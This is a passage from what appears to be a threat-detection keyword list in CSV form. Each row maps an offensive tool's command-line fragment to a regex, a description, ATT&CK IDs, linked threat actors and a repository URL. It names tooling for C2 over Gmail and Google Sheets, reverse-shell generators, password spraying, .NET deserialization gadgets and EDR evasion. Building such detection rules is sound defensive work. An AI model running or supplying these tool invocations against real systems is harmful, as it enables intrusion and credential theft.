T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1259"
"* --functions NtProtectVirtualMemory*NtWriteVirtualMemory -o syscalls_mem*",".{0,1000}\s\-\-functions\sNtProtectVirtualMemory.{0,1000}NtWriteVirtualMemory\s\-o\ssyscalls_mem.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1059 - T1573 - T1218 - T1216","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","N/A","10","1414","180","2024-07-31T05:24:06Z","2022-03-07T18:56:21Z","1260"
"* fuzz -u * -p *--target*",".{0,1000}\sfuzz\s\-u\s.{0,1000}\s\-p\s.{0,1000}\-\-target.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","1261"
"* FUZZ:FUZZ *",".{0,1000}\sFUZZ\:FUZZ\s.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","1262"
"* --fuzzers addition*",".{0,1000}\s\-\-fuzzers\saddition.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1263"
"* --fuzzers bitsquatting*",".{0,1000}\s\-\-fuzzers\sbitsquatting.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1264"
"* --fuzzers cyrillic*",".{0,1000}\s\-\-fuzzers\scyrillic.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1265"
"* --fuzzers dictionary*",".{0,1000}\s\-\-fuzzers\sdictionary.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1266"
"* --fuzzers homoglyph*",".{0,1000}\s\-\-fuzzers\shomoglyph.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1267"
"* --fuzzers hyphenation*",".{0,1000}\s\-\-fuzzers\shyphenation.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1268"
"* --fuzzers insertion*",".{0,1000}\s\-\-fuzzers\sinsertion.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1269"
"* --fuzzers omission*",".{0,1000}\s\-\-fuzzers\somission.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1270"
"* --fuzzers repetition*",".{0,1000}\s\-\-fuzzers\srepetition.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1271"
"* --fuzzers replacement*",".{0,1000}\s\-\-fuzzers\sreplacement.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1272"
"* --fuzzers subdomain*",".{0,1000}\s\-\-fuzzers\ssubdomain.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1273"
"* --fuzzers transposition*",".{0,1000}\s\-\-fuzzers\stransposition.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1274"
"* --fuzzers vowel-swap*",".{0,1000}\s\-\-fuzzers\svowel\-swap.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1275"
"* FWUprank.ps1",".{0,1000}\sFWUprank\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","1276"
"* -g ActivitySurrogateSelector*",".{0,1000}\s\-g\sActivitySurrogateSelector.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","1277"
"* -g ClaimsPrincipal *",".{0,1000}\s\-g\sClaimsPrincipal\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","1278"
"* -g -n --kerberoast*",".{0,1000}\s\-g\s\-n\s\-\-kerberoast.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","1279"
"* -g PSObject *",".{0,1000}\s\-g\sPSObject\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","1280"
"* -g TextFormattingRunProperties *",".{0,1000}\s\-g\sTextFormattingRunProperties\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","1281"
"* --gadget ActivitySurrogateSelector*",".{0,1000}\s\-\-gadget\sActivitySurrogateSelector.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","1282"
"* --gadget ClaimsPrincipal *",".{0,1000}\s\-\-gadget\sClaimsPrincipal\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","1283"
"* --gadget PSObject *",".{0,1000}\s\-\-gadget\sPSObject\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","1284"
"* ganglia-info.nse*",".{0,1000}\sganglia\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1285"
"* GC2-sheet*",".{0,1000}\sGC2\-sheet.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","0","N/A","N/A","10","10","578","111","2025-03-28T19:48:36Z","2021-09-15T19:06:12Z","1286"
"* gcat.py -*",".{0,1000}\sgcat\.py\s\-.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","Sandworm","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","N/A","10","10","1332","425","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z","1287"
"* gclient-build-image:latest *",".{0,1000}\sgclient\-build\-image\:latest\s.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","1288"
"* gen -f client -O windows -A x64*",".{0,1000}\sgen\s\-f\sclient\s\-O\swindows\s\-A\sx64.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","1289"
"* gen -S -f client -O windows -A x64*",".{0,1000}\sgen\s\-S\s\-f\sclient\s\-O\swindows\s\-A\sx64.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","1290"
"* generate audit -ep *--passwords_in_userfile*",".{0,1000}\sgenerate\saudit\s\-ep\s.{0,1000}\-\-passwords_in_userfile.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","1291"
"* generate normal -ep * -d * -u * -pf *",".{0,1000}\sgenerate\snormal\s\-ep\s.{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-pf\s.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","1292"
"* generate normal -ep ex-plan.s365 *",".{0,1000}\sgenerate\snormal\s\-ep\sex\-plan\.s365\s.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","1293"
"* -generate -server * -setcradle bh.py*",".{0,1000}\s\-generate\s\-server\s.{0,1000}\s\-setcradle\sbh\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","1294"
"* -generate -setcradle pythonmemorymodule.py*",".{0,1000}\s\-generate\s\-setcradle\spythonmemorymodule\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","1295"
"* generate_bind_fuegoshell.ps1*",".{0,1000}\sgenerate_bind_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","1296"
"* generate_my_dll*",".{0,1000}\sgenerate_my_dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","0","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","1297"
"* generate_reverse_fuegoshell.ps1*",".{0,1000}\sgenerate_reverse_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","1298"
"* generatePayload*",".{0,1000}\sgeneratePayload.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","1299"
"* --gen-relay-list *",".{0,1000}\s\-\-gen\-relay\-list\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1300"
"* --gen-relay-list /tmp/relaylistOutputFilename.txt*",".{0,1000}\s\-\-gen\-relay\-list\s\/tmp\/relaylistOutputFilename\.txt.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","1301"
"* get class-instances SMS_R_System *",".{0,1000}\sget\sclass\-instances\sSMS_R_System\s.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","1302"
"* get class-properties SMS_Admin*",".{0,1000}\sget\sclass\-properties\sSMS_Admin.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","1303"
"* get collection-members -n USERS*",".{0,1000}\sget\scollection\-members\s\-n\sUSERS.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","1304"
"* get primary-users -u *",".{0,1000}\sget\sprimary\-users\s\-u\s.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","1305"
"* get site-push-settings*",".{0,1000}\sget\ssite\-push\-settings.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","1306"
"*-------------- Get System Priv with WebClient --------------*",".{0,1000}\-\-\-\-\-\-\-\-\-\-\-\-\-\-\sGet\sSystem\sPriv\swith\sWebClient\s\-\-\-\-\-\-\-\-\-\-\-\-\-\-.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","1307"
